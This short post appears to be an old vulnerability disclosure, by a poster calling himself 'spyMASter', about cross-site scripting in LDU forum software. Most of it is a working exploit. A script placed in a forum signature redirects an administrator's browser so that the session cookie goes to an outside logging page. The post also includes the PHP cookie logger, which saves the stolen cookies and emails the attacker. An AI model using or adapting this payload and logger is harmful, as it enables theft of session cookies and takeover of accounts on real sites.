Bug finder:spyMASter Web site:Realhackers.net Contact:bendeniz_avci@xxxxxxxxxxx LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code <SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT> and post a topic to forum when admin look this topic she/he redirect and you can get cookie this is codes of ekle.php you can save cookie to a with this php code <?php $kayit = fopen("spymaster.txt","a"); foreach($_GET as $variable => $value) { fwrite($kayit,$variable . ": " . $value . "\n"); } fwrite($kayit,"---------------------------\n"); fclose($kayit); mail("bendeniz_avci@xxxxxxxxxxx","your cookie ready","http://www.realhackers.net/spyoku.txt";,'From: spymaster@xxxxxxxxxxxxxxx'); ?>
